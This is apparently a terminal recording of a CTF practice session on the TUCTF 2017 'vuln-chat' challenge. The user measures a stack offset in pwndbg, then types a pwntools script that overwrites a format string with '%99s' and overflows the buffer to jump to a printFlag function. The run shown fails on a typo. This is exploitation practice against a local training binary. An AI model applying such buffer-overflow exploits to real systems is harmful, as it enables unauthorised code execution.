\u001b[39m\u001b[38;5;81mebp\u001b[39m\r\n \u001b[1mEBP \u001b[0m \u001b[33m0xffffcd78\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n \u001b[1mESP \u001b[0m \u001b[33m0xffffcd40\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffcd73\u001b[0m\u001b[0m ◂— \u001b[0m'%30s'\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mEIP \u001b[0m\u001b[31m\u001b[0m \u001b[31m0x8048639 (main+175)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148madd\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m8\u001b[39m\r\n\u001b[34m──────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]───────────────────────────────────────────────────\u001b[0m\r\n ► \u001b[1m\u001b[32m0x8048639\u001b[0m\u001b[1m\u001b[0m \u001b[1m\u001b[32m<main+175> \u001b[0m\u001b[1m\u001b[0m   \u001b[1m\u001b[32m\u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m8\u001b[39m\u001b[0m\u001b[1m\u001b[0m        \u001b[31m\u001b[1mESP\u001b[0m\u001b[31m\u001b[0m => \u001b[33m0xffffcd48\u001b[0m (0xffffcd40 + 0x8)\r\n   \u001b[0m0x804863c\u001b[0m \u001b[0m<main+178> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0x80487ec\u001b[39m\r\n   \u001b[0m0x8048641\u001b[0m \u001b[0m<main+183> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31mputs@plt\u001b[0m\u001b[39m                    <\u001b[31mputs@plt\u001b[0m>\r\n \r\n"]
[112.036173, "o", "   \u001b[0m0x8048646\u001b[0m \u001b[0m<main+188> \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m4\u001b[39m\r\n   \u001b[0m0x8048649\u001b[0m \u001b[0m<main+191> \u001b[0m   \u001b[38;5;148mmov\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mdword\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mptr\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;141m\u001b[35mstdout@@GLIBC_2.0\u001b[0m\u001b[39m\u001b[38;5;15m]\u001b[39m     \u001b[31m\u001b[1mEAX\u001b[0m\u001b[31m\u001b[0m, [\u001b[35mstdout@@GLIBC_2.0\u001b[0m]\r\n   \u001b[0m0x804864e\u001b[0m \u001b[0m<main+196> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;81meax\u001b[39m\r\n   \u001b[0m0x804864f\u001b[0m \u001b[0m<main+197> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31mfflush@plt\u001b[0m\u001b[39m                  <\u001b[31mfflush@plt\u001b[0m>\r\n \r\n   \u001b[0m0x8048654\u001b[0m \u001b[0m<main+202> \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m4\u001b[39m\r\n   \u001b[0m0x8048657\u001b[0m \u001b[0m<main+205> \u001b[0m   \u001b[38;5;148mmov\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0\u001b[39m     \u001b[31m\u001b[1mEAX\u001b[0m\u001b[31m\u001b[0m => 0\r\n   \u001b[0m0x804865c\u001b[0m \u001b[0m<main+210> \u001b[0m   \u001b[38;5;148mleave\u001b[39m\u001b[38;5;15m  \u001b[39m\r\n   \u001b[0m0x804865d\u001b[0m \u001b[0m<main+211> \u001b[0m   \u001b[38;5;148m\u001b[1mret\u001b[0m\u001b[39m\u001b[38;5;15m    \u001b[39m\r\n\u001b[34m───────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────\u001b[0m\r\n\u001b[0m00\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0000\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m \u001b[1mesp\u001b[0m \u001b[33m0xffffcd40\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffcd73\u001b[0m\u001b[0m ◂— \u001b[0m'%30s'\r\n"]
[112.036242, "o", "\u001b[0m01\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0004\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-034 \u001b[33m0xffffcd44\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffcd4b\u001b[0m\u001b[0m ◂— \u001b[0m'BBBBBBBBBBBBBBBBBBBB'\r\n\u001b[0m02\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0008\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-030 \u001b[33m0xffffcd48\u001b[0m\u001b[0m ◂— \u001b[0m0x42ffffff\r\n\u001b[0m03\u001b[0m\u001b[0m:\u001b[0m\u001b[0m000c\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-02c \u001b[33m0xffffcd4c\u001b[0m\u001b[0m ◂— \u001b[0m'BBBBBBBBBBBBBBBBBBB'\r\n"]
[112.036308, "o", "\u001b[0m... ↓        3 skipped\u001b[0m\r\n\u001b[0m07\u001b[0m\u001b[0m:\u001b[0m\u001b[0m001c\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-01c \u001b[33m0xffffcd5c\u001b[0m\u001b[0m ◂— \u001b[0m0x424242 /* 'BBB' */\r\n\u001b[34m─────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────\u001b[0m\r\n"]
[112.036816, "o", " ► 0 0x8048639 main+175\r\n   1 0xf7d8ccc3 None\r\n   2 0xf7d8cd88 __libc_start_main+136\r\n   3 0x8048491 _start+33\r\n"]
[112.036989, "o", "\u001b[34m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\r\n\u001b[?2004l\r\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m\u001b[2S\u001b[2A"]
[113.415081, "o", "d"]
[113.546319, "o", "i"]
[113.676617, "o", "s"]
[114.327357, "o", "\b\u001b[K"]
[114.503989, "o", "\b\u001b[K"]
[114.67832, "o", "\b\u001b[K"]
[114.831269, "o", "\u0007"]
[127.260779, "o", "x"]
[127.479162, "o", "/"]
[127.958049, "o", "0"]
[128.36564, "o", "\b\u001b[K"]
[128.4914, "o", "2"]
[128.612449, "o", "0"]
[129.363471, "o", "w"]
[129.887733, "o", "x"]
[130.121568, "o", " "]
[131.767541, "o", "$"]
[133.682957, "o", "e"]
[134.001361, "o", "b"]
[134.267436, "o", "p"]
[134.610249, "o", "-"]
[135.195106, "o", "0"]
[135.356786, "o", "x"]
[136.132435, "o", "2"]
[136.430472, "o", "d"]
[137.227454, "o", "\r\n\u001b[?2004l\r"]
[137.228009, "o", "\u001b[34m0xffffcd4b\u001b[m:\t0x42424242\t0x42424242\t0x42424242\t0x42424242\r\n"]
[137.22845, "o", "\u001b[34m0xffffcd5b\u001b[m:\t0x42424242\t0x41414100\t0x41414141\t0x41414141\r\n"]
[137.228703, "o", "\u001b[34m0xffffcd6b\u001b[m:\t0x41414141\t0x00000000\t0x73303325\t0x00000000\r\n\u001b[34m0xffffcd7b\u001b[m:\t0xd8ccc300\t0x000001f7\t0xffce3400\t0xffce3cff\r\n"]
[137.228773, "o", "\u001b[34m0xffffcd8b\u001b[m:\t0xffcda0ff\t0xf9ae14ff\t0x04858af7\t0x00000108\r\n"]
[137.229438, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[146.188375, "o", "i"]
[146.339988, "o", "n"]
[146.488182, "o", "f"]
[146.605268, "o", "o"]
[147.02577, "o", " "]
[147.188207, "o", "f"]
[147.369539, "o", "r"]
[147.627349, "o", "a"]
[147.889058, "o", "e"]
[148.300317, "o", "\b\u001b[K"]
[148.517345, "o", "m"]
[148.654177, "o", "e"]
[148.83564, "o", "\r\n\u001b[?2004l\r"]
[148.83595, "o", "Stack level 0, frame at 0xffffcd80:\r\n eip = 0x8048639 in main; saved eip = 0xf7d8ccc3\r\n called by frame at 0xffffcde0\r\n Arglist at 0xffffcd78, args: \r\n Locals at 0xffffcd78, Previous frame's sp is 0xffffcd80\r\n"]
[148.836051, "o", " Saved registers:\r\n"]
[148.836364, "o", "  ebp at 0xffffcd78, eip at 0xffffcd7c\r\n"]
[148.83656, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[150.393687, "o", "p"]
[150.701842, "o", " "]
[154.059397, "o", "\u001b[7m0xffffcd7c\u001b[27m"]
[154.376029, "o", "\b\b\b\b\b\b\b\b\b\b0xffffcd7c "]
[154.743878, "o", "-"]
[154.954483, "o", " "]
[157.521369, "o", "\u001b[7m0xffffcd4b\u001b[27m"]
[158.055397, "o", "\b\b\b\b\b\b\b\b\b\b0xffffcd4b\r\n\u001b[?2004l\r"]
[158.055738, "o", "\u001b[36m$2\u001b[m = 49\r\n"]
[158.055926, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[160.854329, "o", "e"]
[160.967754, "o", "x"]
[161.119224, "o", "i"]
[161.325727, "o", "t"]
[161.66879, "o", "\b\u001b[K"]
[162.168642, "o", "\b\u001b[K"]
[162.199777, "o", "\b\u001b[K"]
[162.230354, "o", "\b\u001b[K"]
[162.260825, "o", "\u0007"]
[162.291833, "o", "\u0007"]
[162.322701, "o", "\u0007"]
[162.495459, "o", "b"]
[162.722389, "o", " "]
[163.18071, "o", "p"]
[163.363468, "o", "r"]
[163.513631, "o", "i"]
[163.614346, "o", "n"]
[163.701659, "o", "t"]
[164.316241, "o", "F"]
[164.390485, "o", "l"]
[164.617401, "o", "a"]
[164.744625, "o", "g"]
[165.348217, "o", "\r\n\u001b[?2004l\r"]
[165.349162, "o", "Breakpoint 4 at \u001b[34m0x804856e\u001b[m\r\n"]
[165.349408, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[167.279872, "o", "b"]
[167.496535, "o", " "]
[167.734352, "o", "m"]
[167.859725, "o", "a"]
[167.905971, "o", "i"]
[169.160151, "o", "\b\u001b[K"]
[169.660857, "o", "\b\u001b[K"]
[169.691909, "o", "\b\u001b[K"]
[169.722203, "o", "\b\u001b[K"]
[169.75182, "o", "\b\u001b[K"]
[169.781959, "o", "\u0007"]
[169.812617, "o", "\u0007"]
[169.844502, "o", "\u0007"]
[169.874695, "o", "e"]
[169.96579, "o", "x"]
[170.036402, "o", "i"]
[170.18548, "o", "t"]
[170.371091, "o", "\r\n\u001b[?2004l\r"]
[170.69778, "o", "                                                                                                                                       \r\r"]
[170.697915, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007\r\n"]
[170.730472, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[170.730897, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[171.511643, "o", "c"]
[171.51811, "o", "\b\u001b[4mc\u001b[24m"]
[171.518566, "o", "\b\u001b[4mc\u001b[24m\u001b[38;2;153;153;153mat ghidra.txt\u001b[39m\u001b[13D"]
[171.720825, "o", "\b\u001b[4mc\u001b[39m\u001b[4ma\u001b[24m"]
[171.808289, "o", "\b\b\u001b[4mc\u001b[4ma\u001b[39m\u001b[4mt\u001b[24m"]
[171.812938, "o", "\b\b\b\u001b[24m\u001b[36mc\u001b[24m\u001b[36ma\u001b[24m\u001b[36mt\u001b[39m"]
[172.023199, "o", "\b\u001b[36mt\u001b[36m \u001b[39m"]
[172.026491, "o", "\b\b\u001b[36mt\u001b[39m\u001b[39m "]
[172.505227, "o", "\u001b[39m>\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[9D"]
[172.509773, "o", "\b\u001b[1m\u001b[34m>\u001b[0m\u001b[39m"]
[172.510086, "o", "\u001b[38;2;153;153;153m exp.py\u001b[39m\b\b\b\b\b\b\b"]
[172.653475, "o", "\b\u001b[1m\u001b[34m>\u001b[1m\u001b[34m \u001b[0m\u001b[39m"]
[172.657461, "o", "\b\b\u001b[1m\u001b[34m>\u001b[0m\u001b[39m\u001b[0m\u001b[39m "]
[172.875475, "o", "\u001b[39me"]
[172.942153, "o", "\u001b[39mx"]
[173.536291, "o", "\u001b[4C"]
[173.982719, "o", "\u001b[?1l\u001b>"]
[173.982872, "o", "\u001b[?2004l"]
[173.98766, "o", "\r\r\n"]
[174.731009, "o", "i"]
[175.279283, "o", "f"]
[175.424603, "o", "o"]
[175.464873, "o", "r"]
[175.550076, "o", "m"]
[176.075463, "o", "\b \b"]
[176.575686, "o", "\b \b"]
[176.606222, "o", "\b \b"]
[176.636228, "o", "\b \b"]
[176.666722, "o", "\b \b"]
[176.848942, "o", "f"]
[177.022485, "o", "r"]
[177.113341, "o", "o"]
[177.254044, "o", "m"]
[177.482309, "o", " "]
[178.126581, "o", "p"]
[178.224147, "o", "w"]
[178.355054, "o", "n"]
[178.560854, "o", " "]
[178.782633, "o", "i"]
[179.014542, "o", "m"]
[179.315934, "o", "p"]
[179.382482, "o", "o"]
[179.477213, "o", "r"]
[179.653948, "o", "t"]
[179.816084, "o", " "]
[180.833946, "o", "*"]
[181.388918, "o", "\r\n"]
[182.851325, "o", "p"]
[182.955934, "o", "a"]
[183.103636, "o", "y"]
[183.338949, "o", " "]
[183.910235, "o", "="]
[184.156203, "o", " "]
[185.39554, "o", "b"]
[186.352757, "o", "\""]
[186.500136, "o", "\""]
[186.993543, "o", "\r\n"]
[187.477431, "o", "p"]
[187.649329, "o", "a"]
[187.805117, "o", "y"]
[188.028182, "o", " "]
[188.344404, "o", "+"]
[188.495262, "o", "="]
[193.062611, "o", " "]
[194.77322, "o", "b"]
[195.266855, "o", "\""]
[195.604906, "o", "A"]
[196.008383, "o", "\""]
[196.628504, "o", " "]
[196.873134, "o", "*"]
[197.167573, "o", " "]
[197.569924, "o", "2"]
[197.755661, "o", "0"]
[198.249409, "o", "\r\n"]
[198.69504, "o", "p"]
[198.869076, "o", "a"]
[199.015778, "o", "y"]
[199.26289, "o", " "]
[199.607418, "o", "+"]
[199.787551, "o", "="]
[200.099551, "o", " "]
[200.845739, "o", "p"]
[201.188555, "o", "3"]
[201.365433, "o", "2"]
[202.125794, "o", "("]
[220.560513, "o", "0"]
[220.698173, "o", "x"]
[221.558997, "o", "73393925"]
[222.576581, "o", ")"]
[222.795215, "o", " "]
[223.282376, "o", "/"]
[223.433766, "o", "/"]
[226.216127, "o", "\b \b"]
[226.387214, "o", "\b \b"]
[228.844234, "o", "%"]
[230.179842, "o", "\b \b"]
[230.477428, "o", "s"]
[231.302674, "o", "9"]
[231.438272, "o", "9"]
[231.736858, "o", "%"]
[232.854819, "o", "\b \b"]
[233.076374, "o", "\b \b"]
[233.424396, "o", "\b \b"]
[233.586401, "o", "\b \b"]
[236.851742, "o", "\r\n"]
[238.512387, "o", "p"]
[239.140487, "o", " "]
[239.432849, "o", "="]
[239.679857, "o", " "]
[239.881384, "o", "p"]
[240.054991, "o", "r"]
[240.168618, "o", "o"]
[240.30993, "o", "c"]
[240.531709, "o", "e"]
[240.756842, "o", "s"]
[240.899858, "o", "s"]
[242.01068, "o", "("]
[243.007676, "o", "\""]
[243.29562, "o", "."]
[243.451146, "o", "/"]
[244.162256, "o", "v"]
[244.390154, "o", "u"]
[244.843704, "o", "l"]
[245.038394, "o", "n"]
[245.552252, "o", "-"]
[245.71386, "o", "c"]
[245.880088, "o", "h"]
[246.001268, "o", "a"]
[246.307705, "o", "t"]
[247.076375, "o", "\""]
[247.520059, "o", ")"]
[247.999111, "o", "\r\n"]
[248.960749, "o", "p"]
[249.121388, "o", "a"]
[249.398779, "o", "y"]
[250.795012, "o", "1"]
[250.942162, "o", " "]
[254.797365, "o", "\b \b"]
[254.996033, "o", "\b \b"]
[255.171754, "o", "\b \b"]
[255.332762, "o", "\b \b"]
[255.494086, "o", "\b \b"]
[256.028485, "o", "r"]
[257.000217, "o", "\b \b"]
[257.302394, "o", "p"]
[257.862579, "o", "."]
[258.079911, "o", "r"]
[258.670351, "o", "e"]
[258.925836, "o", "c"]
[259.123282, "o", "v"]
[259.451948, "o", "u"]
[259.677137, "o", "n"]
[259.747526, "o", "t"]
[259.878653, "o", "i"]
[260.069653, "o", "l"]
[262.319058, "o", "("]
[263.034204, "o", "\""]
[263.796224, "o", "\b \b"]
[263.957406, "o", "b"]
[264.365063, "o", "\""]
[274.599959, "o", "Enter your username:"]
[275.718456, "o", "\""]
[276.071115, "o", ")"]
[276.442828, "o", "\r\n"]
[277.128919, "o", "p"]
[277.369708, "o", "."]
[277.536385, "o", "s"]
[277.704659, "o", "e"]
[277.809339, "o", "n"]
[277.930509, "o", "d"]
[278.101707, "o", "l"]
[278.26738, "o", "i"]
[278.45329, "o", "n"]
[278.665912, "o", "e"]
[279.048769, "o", "("]
[279.519023, "o", "p"]
[279.671747, "o", "a"]
[279.82189, "o", "y"]
[280.21794, "o", ")"]
[284.306491, "o", "\r\n"]
[285.279162, "o", "p"]
[285.4458, "o", "a"]
[285.613907, "o", "y"]
[286.030524, "o", "1"]
[286.636022, "o", " "]
[287.830098, "o", "="]
[288.198323, "o", " "]
[288.712446, "o", "b"]
[289.231255, "o", "\""]
[289.384445, "o", "\""]
[289.680139, "o", "\r\n"]
[290.214226, "o", "p"]
[290.347238, "o", "a"]
[290.503294, "o", "y"]
[290.927052, "o", "1"]
[291.073285, "o", " "]
[292.467255, "o", "+"]
[292.947582, "o", "="]
[293.253786, "o", " "]
[294.604754, "o", "\""]
[296.389279, "o", "\b \b"]
[296.697599, "o", "b"]
[297.175834, "o", "\""]
[299.043329, "o", "A"]
[299.471391, "o", "\""]
[300.004102, "o", " "]
[300.427116, "o", "*"]
[300.709778, "o", " "]
[300.911894, "o", "4"]
[301.399516, "o", "9"]
[303.204094, "o", "\r\n"]
[304.197397, "o", "p"]
[304.5049, "o", "a"]
[304.666252, "o", "y"]
[305.524023, "o", "!"]
[306.516429, "o", "\b \b"]
[306.687651, "o", "1"]
[306.895333, "o", " "]
[307.429536, "o", "+"]
[307.619946, "o", "="]
[309.496378, "o", " "]
[309.824944, "o", "p"]
[310.090034, "o", "3"]
[310.298453, "o", "2"]
[314.78833, "o", "("]
[323.368204, "o", "0"]
[323.524461, "o", "x"]
[325.078311, "o", "0804856b"]
[326.208786, "o", ")"]
[329.657062, "o", "\r\n"]
[330.142883, "o", "p"]
[330.420943, "o", "."]
[331.631913, "o", "r"]
[331.811942, "o", "e"]
[332.335805, "o", "c"]
[332.493106, "o", "v"]
[333.162954, "o", "l"]
[333.353938, "o", "i"]
[333.535754, "o", "n"]
[333.739215, "o", "e"]
[334.382768, "o", "("]
[335.222355, "o", "\""]
[343.730787, "o", "I know I can trust you?"]
[344.369571, "o", "\b \b"]
[344.869767, "o", "\b \b"]
[344.900234, "o", "\b \b"]
[344.930718, "o", "\b \b"]
[344.961339, "o", "\b \b"]
[344.991946, "o", "\b \b"]
[345.021532, "o", "\b \b"]
[345.052443, "o", "\b \b"]
[345.081753, "o", "\b \b"]
[345.112092, "o", "\b \b"]
[345.14222, "o", "\b \b"]
[345.173796, "o", "\b \b"]
[345.204337, "o", "\b \b"]
[345.235414, "o", "\b \b"]
[345.26893, "o", "\b \b"]
[345.296137, "o", "\b \b"]
[345.327309, "o", "\b \b"]
[345.357898, "o", "\b \b"]
[345.387887, "o", "\b \b"]
[345.563163, "o", "\b \b"]
[345.754487, "o", "\b \b"]
[345.930753, "o", "\b \b"]
[346.082441, "o", "\b \b"]
[346.249687, "o", "\b \b"]
[346.79523, "o", "b"]
[347.34936, "o", "\""]
[347.945195, "o", "I know I can trust you?"]
[348.568434, "o", "\""]
[348.972865, "o", ")"]
[349.727294, "o", "\r\n"]
[350.628982, "o", "p"]
[350.92257, "o", "."]
[351.159508, "o", "s"]
[351.320525, "o", "e"]
[351.456208, "o", "n"]
[351.582012, "o", "d"]
[352.181424, "o", "l"]
[352.408715, "o", "i"]
[352.60472, "o", "n"]
[352.791816, "o", "e"]
[353.189447, "o", "("]
[355.251828, "o", "p"]
[355.414016, "o", "a"]
[355.580082, "o", "y"]
[356.053187, "o", "1"]
[356.442375, "o", "0"]
[357.169907, "o", "\b \b"]
[357.504486, "o", ")"]
[358.973484, "o", "\r\n"]
[359.707922, "o", "p"]
[359.966596, "o", "."]
[360.621606, "o", "i"]
[360.813448, "o", "n"]
[361.008243, "o", "t"]
[361.261792, "o", "e"]
[361.443596, "o", "r"]
[361.729925, "o", "a"]
[362.202736, "o", "t"]
[362.445616, "o", "i"]
[362.601062, "o", "v"]
[363.211344, "o", "r"]
[364.425864, "o", "\b \b"]
[364.546785, "o", "e"]
[365.405096, "o", "("]
[365.475832, "o", ")"]
[366.250903, "o", "\r\n"]
[366.866423, "o", "^C"]
[366.866995, "o", "\r\n"]
[366.867279, "o", "                                                                                                                                       \r\r\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007"]
[366.867503, "o", "\r\n"]
[366.900474, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[366.900634, "o", "\u001b[?2004h"]
[368.072695, "o", "p"]
[368.079973, "o", "\b\u001b[4mp\u001b[24m"]
[368.080345, "o", "\b\u001b[4mp\u001b[24m\u001b[38;2;153;153;153mwn checksec vuln-chat\u001b[39m\u001b[21D"]
[368.431455, "o", "\b\u001b[4mp\u001b[39m\u001b[4my\u001b[24m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[20D"]
[368.439691, "o", "\u001b[38;2;153;153;153mthon exp.py\u001b[39m\u001b[11D"]
[368.635783, "o", "\b\b\u001b[4mp\u001b[4my\u001b[39m\u001b[4mt\u001b[24m"]
[368.847566, "o", "\b\u001b[4mt\u001b[39m\u001b[4mh\u001b[24m"]
[369.244284, "o", "\b\u001b[4mh\u001b[39m\u001b[4mn\u001b[24m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[8D"]
[369.894676, "o", "\b\b\u001b[4mh\u001b[24m\u001b[24m \b"]
[369.899512, "o", "\u001b[38;2;153;153;153mon exp.py\u001b[39m\u001b[9D"]
[370.638775, "o", "\u001b[9C"]
[370.643942, "o", "\u001b[13D\u001b[24m\u001b[36mp\u001b[24m\u001b[36my\u001b[24m\u001b[36mt\u001b[24m\u001b[36mh\u001b[36mo\u001b[36mn\u001b[39m\u001b[38;2;153;153;153m \u001b[1m\u001b[38;2;153;153;153me\u001b[1m\u001b[38;2;153;153;153mx\u001b[1m\u001b[38;2;153;153;153mp\u001b[1m\u001b[38;2;153;153;153m.\u001b[1m\u001b[38;2;153;153;153mp\u001b[1m\u001b[38;2;153;153;153my\u001b[0m\u001b[39m"]
[373.219665, "o", "\u001b[?1l\u001b>"]
[373.219943, "o", "\u001b[?2004l"]
[373.224165, "o", "\r\r\n"]
[373.625969, "o", "[x] Starting local process './vuln-chat'\r\n"]
[373.626421, "o", "\u001b[A[\u001b[1m\u001b[34mq\u001b[m] \r\n"]
[373.636428, "o", "\u001b[5G\u001b[AStarting local process './vuln-chat': pid 43585\r\n"]
[373.636867, "o", "\u001b[A[\u001b[1m\u001b[32m+\u001b[m] \r\n"]
[373.700845, "o", "\u001b[38;5;26mTraceback (most recent call last):\u001b[39m\r\n  File \u001b[38;5;28m\"/home/himanshu/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat/exp.py\"\u001b[39m, line \u001b[38;5;241m13\u001b[39m, in <module>\r\n\u001b[38;5;250m    \u001b[39mp\u001b[38;5;241m.\u001b[39minterative()\r\n\u001b[38;5;250m    \u001b[39m^^^^^^^^^^^^\r\n  File \u001b[38;5;28m\"/usr/lib/python3/dist-packages/pwnlib/tubes/process.py\"\u001b[39m, line \u001b[38;5;241m659\u001b[39m, in __getattr__\r\n\u001b[38;5;250m    \u001b[39m\u001b[38;5;28;01mraise\u001b[39;00m \u001b[38;5;167;01mAttributeError\u001b[39;00m(\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124m'\u001b[39m\u001b[38;5;124mprocess\u001b[39m\u001b[38;5;124m'\u001b[39m\u001b[38;5;124m object has no attribute \u001b[39m\u001b[38;5;124m'\u001b[39m\u001b[38;5;132;01m%s\u001b[39;00m\u001b[38;5;124m'\u001b[39m\u001b[38;5;124m\"\u001b[39m \u001b[38;5;241m%\u001b[39m attr)\r\n\u001b[38;5;160mAttributeError\u001b[39m: 'process' object has no attribute 'interative'. Did you mean: 'interactive'?\r\n"]
[373.702344, "o", "[\u001b[1m\u001b[34m*\u001b[m] Stopped process './vuln-chat' (pid 43585)\r\n"]
[373.834492, "o", "                                                                                                                                       \r\r"]
[373.834662, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007\r\n"]
[373.866659, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[373.866767, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[381.406474, "o", "v"]
[381.414018, "o", "\b\u001b[1mv\u001b[0m"]
[381.414381, "o", "\b\u001b[1mv\u001b[0m\u001b[38;2;153;153;153mim exp.py\u001b[39m\u001b[9D"]
[381.504682, "o", "\b\u001b[1mv\u001b[39m\u001b[1mi\u001b[0m"]
[381.507979, "o", "\b\b\u001b[0m\u001b[36mv\u001b[0m\u001b[36mi\u001b[39m"]
[381.874691, "o", "\b\b\u001b[36mv\u001b[36mi\u001b[36m \u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b\b"]
[381.878987, "o", "\b\b\b\u001b[36mv\u001b[36mi\u001b[39m\u001b[39m "]
[382.716778, "o", "m"]
[383.097046, "o", "\b \b"]
[383.267653, "o", "\b"]
[383.272025, "o", "\u001b[38;2;153;153;153mm exp.py\u001b[39m\u001b[8D"]
[383.446062, "o", "\b\b\u001b[36mv\u001b[36mi\u001b[36mm\u001b[39m"]
[383.952443, "o", "\u001b[7C"]
[383.957187, "o", "\b\b\b\b\b\b\u001b[1m\u001b[38;2;153;153;153me\u001b[1m\u001b[38;2;153;153;153mx\u001b[1m\u001b[38;2;153;153;153mp\u001b[1m\u001b[38;2;153;153;153m.\u001b[1m\u001b[38;2;153;153;153mp\u001b[1m\u001b[38;2;153;153;153my\u001b[0m\u001b[39m"]
[384.210435, "o", "\u001b[?1l\u001b>"]
[384.210584, "o", "\u001b[?2004l"]
[384.214829, "o", "\r\r\n"]
[384.267327, "o", "\u001b[?1006;1000h\u001b[?1002h\u001b[?1049h\u001b[22;0;0t\u001b[>4;2m\u001b[?1h\u001b=\u001b[?2004h\u001b[?1004h\u001b[1;42r\u001b[?12h\u001b[?12l\u001b[22;2t\u001b[22;1t"]
